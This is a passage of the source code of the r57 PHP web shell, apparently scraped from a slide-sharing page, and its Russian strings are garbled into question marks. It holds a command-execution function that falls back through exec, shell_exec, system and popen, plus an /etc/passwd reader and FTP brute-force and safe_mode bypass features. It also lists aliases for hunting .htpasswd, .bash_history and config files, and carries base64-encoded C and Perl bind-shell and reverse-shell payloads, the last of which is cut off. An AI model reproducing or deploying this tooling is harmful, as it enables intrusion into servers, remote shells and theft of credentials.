  16. 16. ru_text21=>????? ???, ru_text22=>datapipe, ru_text23=>????????? ????, ru_text24=>????????? ????, ru_text25=>????????? ????, ru_text26=>????????????, ru_butt5 =>?????????, ru_text28=>?????? ? safe_mode, ru_text29=>?????? ????????, ru_butt6 =>???????, ru_text30=>???????? ?????, ru_butt7 =>???????, ru_text31=>???? ?? ??????, ru_text32=>?????????? PHP ????, ru_text33=>???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL, ru_butt8 =>?????????, ru_text34=>???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include, ru_text35=>???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql, ru_text36=>???? . ???????, ru_text37=>?????, ru_text38=>??????, ru_text39=>????, ru_text40=>???? ??????? ???? ??????, ru_butt9 =>????, ru_text41=>????????? ? ?????, ru_text42=>?????????????? ?????, ru_text43=>????????????? ????, ru_butt10=>?????????, ru_butt11=>?????????????, ru_text44=>?????????????? ????? ??????????! ?????? ?????? ??? ??????!, ru_text45=>???? ????????, ru_text46=>???????? phpinfo(), ru_text47=>???????? ???????? php.ini, ru_text48=>???????? ????????? ??????, ru_text49=>???????? ??????? ? ???????, ru_text50=>?????????? ? ??????????, ru_text51=>?????????? ? ??????, ru_text52=>????? ??? ??????, ru_text53=>?????? ? ?????, ru_text54=>????? ?????? ? ??????, ru_butt12=>?????, ru_text55=>?????? ? ??????, ru_text56=>?????? ?? ???????, ru_text57=>???????/??????? ????/??????????, ru_text58=>???, ru_text59=>????, ru_text60=>??????????, ru_butt13=>???????/???????, ru_text61=>???? ??????, ru_text62=>?????????? ???????, ru_text63=>???? ??????, ru_text64=>?????????? ???????, ru_text65=>???????, ru_text66=>???????,file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  17. 17. ru_text67=>Chown/Chgrp/Chmod, ru_text68=>???????, ru_text69=>????????1, ru_text70=>????????2, ru_text71=>"?????? ???????? ???????:rn- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) rn- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) rn- ??? ??????? CHMOD - ????? ????? ? ???????????? ?? ??????????? (???????? 0777)", ru_text72=>????? ??? ??????, ru_text73=>?????? ? ?????, ru_text74=>?????? ? ??????, ru_text75=>* ????? ???????????? ?????????? ?????????, ru_text76=>????? ?????? ? ?????? ? ??????? ??????? find, ru_text80=>???, ru_text81=>????, ru_text82=>???? ??????, ru_text83=>?????????? SQL ???????, ru_text84=>SQL ??????, ru_text85=>???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ??????? , ru_text86=>?????????? ????? ? ???????, ru_butt14=>???????, ru_text87=>?????????? ?????? ? ?????????? ftp-???????, ru_text88=>FTP-??????:????, ru_text89=>???? ?? ftp ???????, ru_text90=>????? ????????, ru_text91=>???????????? ?, ru_text92=>??? ?????????, ru_text93=>FTP, ru_text94=>FTP-????????, ru_text95=>?????? ?????????????, ru_text96=>?? ??????? ???????? ?????? ?????????????, ru_text97=>????????? ??????????: , ru_text98=>??????? ???????????: , ru_text99=>* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd, ru_text100=>???????? ?????? ?? ????????? ??? ??????, ru_text101=>???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????, ru_text102=>?????, ru_text103=>???????? ??????, ru_text104=>???????? ????? ?? ???????? ????, ru_text105=>????, ru_text106=>??, ru_text107=>????, ru_butt15=>?????????, ru_text108=>????? ??????, ru_text109=>????????, ru_text110=>??????????, ru_text111=>SQL-?????? : ????, ru_text112=>???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail, ru_text113=>???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ??????? ??????? imap_list, ru_text114=>???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ????????? ????? imap_body, ru_text115=>???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ?file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  18. 18. copy(), ru_text116=>?????????? ????, ru_text117=>?, ru_text118=>???? ??????????, ru_text119=>?? ??????? ??????????? ????, ru_err0=>??????! ?? ???? ???????? ? ???? , ru_err1=>??????! ?? ???? ????????? ???? , ru_err2=>??????! ?? ??????? ??????? , ru_err3=>??????! ?? ??????? ???????????? ? ftp ???????, ru_err4=>?????? ??????????? ?? ftp ???????, ru_err5=>??????! ?? ??????? ???????? ?????????? ?? ftp ???????, ru_err6=>??????! ?? ??????? ????????? ??????, ru_err7=>?????? ??????????, /* --------------------------------------------------------------- */ eng_text1 =>Executed command, eng_text2 =>Execute command on server, eng_text3 =>Run command, eng_text4 =>Work directory, eng_text5 =>Upload files on server, eng_text6 =>Local file, eng_text7 =>Aliases, eng_text8 =>Select alias, eng_butt1 =>Execute, eng_butt2 =>Upload, eng_text9 =>Bind port to /bin/bash, eng_text10=>Port, eng_text11=>Password for access, eng_butt3 =>Bind, eng_text12=>back-connect, eng_text13=>IP, eng_text14=>Port, eng_butt4 =>Connect, eng_text15=>Upload files from remote server, eng_text16=>With, eng_text17=>Remote file, eng_text18=>Local file, eng_text19=>Exploits, eng_text20=>Use, eng_text21=>&nbsp;New name, eng_text22=>datapipe, eng_text23=>Local port, eng_text24=>Remote host, eng_text25=>Remote port, eng_text26=>Use, eng_butt5 =>Run, eng_text28=>Work in safe_mode, eng_text29=>ACCESS DENIED, eng_butt6 =>Change, eng_text30=>Cat file, eng_butt7 =>Show, eng_text31=>File not found, eng_text32=>Eval PHP code, eng_text33=>Test bypass open_basedir with cURL functions, eng_butt8 =>Test,file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  19. 19. eng_text34=>Test bypass safe_mode with include function, eng_text35=>Test bypass safe_mode with load file in mysql, eng_text36=>Database . Table, eng_text37=>Login, eng_text38=>Password, eng_text39=>Database, eng_text40=>Dump database table, eng_butt9 =>Dump, eng_text41=>Save dump in file, eng_text42=>Edit files, eng_text43=>File for edit, eng_butt10=>Save, eng_text44=>Cant edit file! Only read access!, eng_text45=>File saved, eng_text46=>Show phpinfo(), eng_text47=>Show variables from php.ini, eng_text48=>Delete temp files, eng_butt11=>Edit file, eng_text49=>Delete script from server, eng_text50=>View cpu info, eng_text51=>View memory info, eng_text52=>Find text, eng_text53=>In dirs, eng_text54=>Find text in files, eng_butt12=>Find, eng_text55=>Only in files, eng_text56=>Nothing :(, eng_text57=>Create/Delete File/Dir, eng_text58=>name, eng_text59=>file, eng_text60=>dir, eng_butt13=>Create/Delete, eng_text61=>File created, eng_text62=>Dir created, eng_text63=>File deleted, eng_text64=>Dir deleted, eng_text65=>Create, eng_text66=>Delete, eng_text67=>Chown/Chgrp/Chmod, eng_text68=>Command, eng_text69=>param1, eng_text70=>param2, eng_text71=>"Second commands param is:rn- for CHOWN - name of new owner or UIDrn- for CHGRP - group name or GIDrn- for CHMOD - 0777, 0755...", eng_text72=>Text for find, eng_text73=>Find in folder, eng_text74=>Find in files, eng_text75=>* you can use regexp, eng_text76=>Search text in files via find, eng_text80=>Type, eng_text81=>Net, eng_text82=>Databases, eng_text83=>Run SQL query, eng_text84=>SQL query,file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  20. 20. eng_text85=>Test bypass safe_mode with commands execute via MSSQL server, eng_text86=>Download files from server, eng_butt14=>Download, eng_text87=>Download files from remote ftp-server, eng_text88=>FTP-server:port, eng_text89=>File on ftp, eng_text90=>Transfer mode, eng_text91=>Archivation, eng_text92=>without archivation, eng_text93=>FTP, eng_text94=>FTP-bruteforce, eng_text95=>Users list, eng_text96=>Cant get users list, eng_text97=>checked: , eng_text98=>success: , eng_text99=>* use username from /etc/passwd for ftp login and password, eng_text100=>Send file to remote ftp server, eng_text101=>Use reverse (user -> resu) login for password, eng_text102=>Mail, eng_text103=>Send email, eng_text104=>Send file to email, eng_text105=>To, eng_text106=>From, eng_text107=>Subj, eng_butt15=>Send, eng_text108=>Mail, eng_text109=>Hide, eng_text110=>Show, eng_text111=>SQL-Server : Port, eng_text112=>Test bypass safe_mode with function mb_send_mail, eng_text113=>Test bypass safe_mode, view dir list via imap_list, eng_text114=>Test bypass safe_mode, view file contest via imap_body, eng_text115=>Test bypass safe_mode, copy file via compress.zlib:// in function copy(), eng_text116=>Copy from, eng_text117=>to, eng_text118=>File copied, eng_text119=>Cant copy file, eng_err0=>Error! Cant write in file , eng_err1=>Error! Cant read file , eng_err2=>Error! Cant create , eng_err3=>Error! Cant connect to ftp, eng_err4=>Error! Cant login on ftp server, eng_err5=>Error! Cant change dir on ftp, eng_err6=>Error! Cant sent mail, eng_err7=>Mail send, ); /* ?????? ?????? ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) ?? ?????? ???? ????????? ??? ???????? ???????. */ $aliases=array( find suid files=>find / -type f -perm -04000 -ls, find suid files in current dir=>find . -type f -perm -04000 -ls,file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  21. 21. find sgid files=>find / -type f -perm -02000 -ls, find sgid files in current dir=>find . -type f -perm -02000 -ls, find config.inc.php files=>find / -type f -name config.inc.php, find config.inc.php files in current dir=>find . -type f -name config.inc.php, find config* files=>find / -type f -name "config*", find config* files in current dir=>find . -type f -name "config*", find all writable files=>find / -type f -perm -2 -ls, find all writable files in current dir=>find . -type f -perm -2 -ls, find all writable directories=>find / -type d -perm -2 -ls, find all writable directories in current dir=>find . -type d -perm -2 -ls, find all writable directories and files=>find / -perm -2 -ls, find all writable directories and files in current dir=>find . -perm -2 -ls, find all service.pwd files=>find / -type f -name service.pwd, find service.pwd files in current dir=>find . -type f -name service.pwd, find all .htpasswd files=>find / -type f -name .htpasswd, find .htpasswd files in current dir=>find . -type f -name .htpasswd, find all .bash_history files=>find / -type f -name .bash_history, find .bash_history files in current dir=>find . -type f -name .bash_history, find all .mysql_history files=>find / -type f -name .mysql_history, find .mysql_history files in current dir=>find . -type f -name .mysql_history, find all .fetchmailrc files=>find / -type f -name .fetchmailrc, find .fetchmailrc files in current dir=>find . -type f -name .fetchmailrc, list file attributes on a Linux second extended file system=>lsattr -va, show opened ports=>netstat -an | grep -i listen, ----------------------------------------------------------------------------------------------------=>ls -la ); $table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; $table_up2 = " ::</div></b></font></td></tr><tr><td>"; $table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; $table_end1 = "</td></tr>"; $arrow = " <font face=Webdings color=gray>4</font>"; $lb = "<font color=black>[</font>"; $rb = "<font color=black>]</font>"; $font = "<font face=Verdana size=-2>"; $ts = "<table class=table1 width=100% align=center>"; $te = "</table>"; $fs = "<form name=form method=POST>"; $fe = "</form>"; if(isset($_GET[users])) { if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language._text96]."</font></center>"; } else { echo <center>; foreach($users as $user) { echo $user."<br>"; } echo </center>; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die(); } if (!empty($_POST[dir])) { @chdir($_POST[dir]); }file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  22. 22. $dir = @getcwd(); $unix = 0; if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; if(empty($dir)) { $os = getenv(OS); if(empty($os)){ $os = php_uname(); } if(empty($os)){ $os ="-"; $unix=1; } else { if(@eregi("^win",$os)) { $unix = 0; } else { $unix = 1; } } } if(!empty($_POST[s_dir]) && !empty($_POST[s_text]) && !empty($_POST[cmd]) && $_POST[cmd] == "search_text") { echo $head; if(!empty($_POST[s_mask]) && !empty($_POST[m])) { $sr = new SearchResult($_POST[s_dir],$_POST[s_text],$_POST[s_mask]); } else { $sr = new SearchResult($_POST[s_dir],$_POST[s_text]); } $sr->SearchText(0,0); $res = $sr->GetResultFiles(); $found = $sr->GetMatchesCount(); $titles = $sr->GetTitles(); $r = ""; if($found > 0) { $r .= "<TABLE width=100%>"; foreach($res as $file=>$v) { $r .= "<TR>"; $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); $r .= (!$unix)? str_replace("/","",$file) : $file; $r .= "</b></font></ TD>"; $r .= "</TR>"; foreach($v as $a=>$b) { $r .= "<TR>"; $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; $r .= "</TR>n"; } } $r .= "</TABLE>"; echo $r; } else { echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language._text56]."</B></font></P>"; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die();file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  23. 23. } if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } $SERVER_SOFTWARE = getenv(SERVER_SOFTWARE); if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } function ws($i) { return @str_repeat("&nbsp;",$i); } function ex($cfe) { $res = ; if (!empty($cfe)) { if(function_exists(exec)) { @exec($cfe,$res); $res = join("n",$res); } elseif(function_exists(shell_exec)) { $res = @shell_exec($cfe); } elseif(function_exists(system)) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists(passthru)) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } function get_users() { $users = array(); $rows=file(/etc/passwd); if(!$rows) return 0; foreach ($rows as $string) { $user = @explode(":",$string); if(substr($string,0,1)!=#) array_push($users,$user[0]);file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  24. 24. } return $users; } function err($n,$txt=) { echo <table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>; echo $GLOBALS[lang][$GLOBALS[language]._err.$n]; if(!empty($txt)) { echo " $txt"; } echo </b></div></font></td></tr></table>; return null; } function perms($mode) { if (!$GLOBALS[unix]) return 0; if( $mode & 0x1000 ) { $type=p; } else if( $mode & 0x2000 ) { $type=c; } else if( $mode & 0x4000 ) { $type=d; } else if( $mode & 0x6000 ) { $type=b; } else if( $mode & 0x8000 ) { $type=-; } else if( $mode & 0xA000 ) { $type=l; } else if( $mode & 0xC000 ) { $type=s; } else $type=u; $owner["read"] = ($mode & 00400) ? r : -; $owner["write"] = ($mode & 00200) ? w : -; $owner["execute"] = ($mode & 00100) ? x : -; $group["read"] = ($mode & 00040) ? r : -; $group["write"] = ($mode & 00020) ? w : -; $group["execute"] = ($mode & 00010) ? x : -; $world["read"] = ($mode & 00004) ? r : -; $world["write"] = ($mode & 00002) ? w : -; $world["execute"] = ($mode & 00001) ? x : -; if( $mode & 0x800 ) $owner["execute"] = ($owner[execute]==x) ? s : S; if( $mode & 0x400 ) $group["execute"] = ($group[execute]==x) ? s : S; if( $mode & 0x200 ) $world["execute"] = ($world[execute]==x) ? t : T; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner[read], $owner[write], $owner[execute]); $s.=sprintf("%1s%1s%1s", $group[read], $group[write], $group[execute]); $s.=sprintf("%1s%1s%1s", $world[read], $world[write], $world[execute]); return trim($s); } function in($type,$name,$size,$value,$checked=0) { $ret = "<input type=".$type." name=".$name." "; if($size != 0) { $ret .= "size=".$size." "; } $ret .= "value="".$value."""; if($checked) $ret .= " checked"; return $ret.">"; } function which($pr) { $path = ex("which $pr"); if(!empty($path)) { return $path; } else { return $pr; } }file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  25. 25. function cf($fname,$text) { $w_file=@fopen($fname,"w") or err(0); if($w_file) { @fputs($w_file,@base64_decode($text)); @fclose($w_file); } } function sr($l,$t1,$t2) { return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; } if (!@function_exists("view_size")) { function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } } function DirFilesR($dir,$types=) { $files = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(@is_dir($dir."/".$file)) $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); else { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if($types) { if(@in_array($ext,explode(;,$types))) $files[] = $dir."/".$file; } else $files[] = $dir."/".$file; } } } @closedir($handle); } return $files; } class SearchResultfile:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  26. 26. { var $text; var $FilesToSearch; var $ResultFiles; var $FilesTotal; var $MatchesCount; var $FileMatschesCount; var $TimeStart; var $TimeTotal; var $titles; function SearchResult($dir,$text,$filter=) { $dirs = @explode(";",$dir); $this->FilesToSearch = Array(); for($a=0;$a<count($dirs);$a++) $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); $this->text = $text; $this->FilesTotal = @count($this->FilesToSearch); $this->TimeStart = getmicrotime(); $this->MatchesCount = 0; $this->ResultFiles = Array(); $this->FileMatchesCount = Array(); $this->titles = Array(); } function GetFilesTotal() { return $this->FilesTotal; } function GetTitles() { return $this->titles; } function GetTimeTotal() { return $this->TimeTotal; } function GetMatchesCount() { return $this->MatchesCount; } function GetFileMatchesCount() { return $this->FileMatchesCount; } function GetResultFiles() { return $this->ResultFiles; } function SearchText($phrase=0,$case=0) { $qq = @explode( ,$this->text); $delim = |; if($phrase) foreach($qq as $k=>$v) $qq[$k] = b.$v.b; $words = (.@implode($delim,$qq).); $pattern = "/".$words."/"; if(!$case) $pattern .= i; foreach($this->FilesToSearch as $k=>$filename) { $this->FileMatchesCount[$filename] = 0; $FileStrings = @file($filename) or @next; for($a=0;$a<@count($FileStrings);$a++) { $count = 0; $CurString = $FileStrings[$a]; $CurString = @Trim($CurString); $CurString = @strip_tags($CurString); $aa = ; if(($count = @preg_match_all($pattern,$CurString,$aa))) { $CurString = @preg_replace($pattern,"<SPAN style=color: #990000;><b>1</b></SPAN>",$CurString);file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  27. 27. $this->ResultFiles[$filename][$a+1] = $CurString; $this->MatchesCount += $count; $this->FileMatchesCount[$filename] += $count; } } } $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); } } function getmicrotime() { list($usec,$sec) = @explode(" ",@microtime()); return ((float)$usec + (float)$sec); } $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3l zL3R5cGVzLmg+DQojaW5jbHVkZS A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1 haW4oYXJnYyxhcmd2KQ0KaW50I GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCi BzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1v dGUuc2luX3BvcnQgPSBodG9ucyhhdG9 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIH NvY2tmZCA9IHNvY2tldChBRl9JTkVULF NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZ mQsIChzdHJ1Y3Qgc29ja2FkZHIgK ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZ D1hY2NlcHQoc29ja2ZkLDAsMCk7DQog ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cm l0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpD QogICBzeXN0ZW0oImVjaG8gd2VsY2 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29 ycnkiKTsNCiAgIGNsb3NlKG5ld 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IG k7DQpmb3IoaT0wO2k8c3RybGVuKGVu dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlb nRlcmVkW2ldID09ICdccicpDQp lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0= "; $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAx KSB7IGV4aXQoMSk7IH0NCiRMS VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3Rjc CcpOw0Kc29ja2V0KFMsJlBGX0lORVQs JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3 B0KFMsU09MX1NPQ0tFVCxTT19SRVV TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgI kNhbnQgb3BlbiBwb3J0XG4iOw0KbG lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05 OLFMpOw0KaWYoISgkcGlkPWZvcmspK Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05 OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleG VjdXRlICRTSEVMTFxuIjsNCmNsb3Nfile:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  28. 28. lIENPTk47DQpleGl0IDA7DQp9DQp9"; $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2Vj aG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsx XTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx 8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX 1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQp vcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN 5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgP G5ldGluZXQvaW4uaD4NCmludC BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBz aW47DQogY2hhciBybXNbMjFdPSJyb SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J 0ID0gaHRvbnMoYXRvaShhcmd2WzJd KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSx zdHJsZW4oYXJndlsxXSkrMStzdHJ sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19U Q1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVy cm9yKCJbLV0gY29ubmVjdCgpIik7D QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1c DIoZmQsIDApOw0KIGR1cDIoZmQsIDEp Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk 7IA0KfQ=="; $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlI DxzeXMvd2FpdC5oPg0KI2luY2 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2lu Y2x1ZGUgPGVycm5vLmg+DQojaW5jb HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQoja WZkZWYgU1RSRVJST1INCmV4dGVybiBj aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVma W5lZCBlcnJvciI7DQpjaGFyICpzdHJ lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5k ZWY7DQpyZXR1cm4gc3lzX2Vycm xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBj aGFyICoqYXJndjsgIA0KeyANCiAga W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3R ydWN0IHNvY2thZGRyX2luIGxhZGRy LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyL CBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogI HVuc2lnbmVkIHNob3J0IG9wb3J0Ow 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCBy ZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGl mICghKGggPSBnZXRob3N0YnluYW1l 